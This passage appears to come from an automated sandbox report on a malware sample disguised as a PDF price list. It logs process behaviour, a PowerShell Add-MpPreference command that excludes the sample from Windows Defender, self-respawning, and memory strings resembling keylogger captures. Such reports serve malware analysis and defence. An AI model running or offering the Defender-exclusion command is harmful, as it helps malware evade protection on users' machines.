                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394296Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394077Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399657
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399532
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399422
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399313
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399188
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398938
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398813
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398469
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398360
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398235
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398110
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397989
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397860
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397744
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396947
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396280
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396063
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395953
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395844
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395610
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395485
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395360
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395235
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395110
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394985
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394860
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394610
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394266
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4146532322.0000000005F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeProcess created: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}THcq N
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q?<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}r{Win}rTHcq N
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q><b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}r{Win}THcq N
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.0000000002991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}rTHcq N
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4141108108.00000000029FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Time: 12/05/2024 07:06:34<br>User Name: user<br>Computer Name: 675052<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><b>[ Program Manager]</b> (26/09/2024 19:22:36)<br>{Win}r{Win}r
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
